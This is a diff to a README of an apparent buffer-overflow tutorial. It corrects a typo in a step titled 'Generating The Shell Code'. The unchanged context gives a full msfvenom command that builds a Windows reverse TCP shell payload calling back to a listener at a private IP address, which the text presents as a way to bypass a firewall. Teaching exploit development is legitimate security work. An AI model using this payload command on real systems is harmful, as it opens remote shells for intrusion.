0MrError0/BufferOverflowGuide/README.md

 ## Step 5 Genrating The Shell Code

-**Moving Furture We will Generate the Reverse TCP shellcode to bypass the firewall if it is Anabled Type the follwing Command To gen erate the shellCode**
+**Moving Furture We will Generate the Reverse TCP shellcode to bypass the firewall if it is Anabled Type the follwing Command To generate the shellCode**
 <br  />

 >msfvenom -p windows/shell_reverse_tcp LHOST=192.168.94.10 LPORT=4444 EXITFUNC=thread -b "\x00" -a x86 -f python.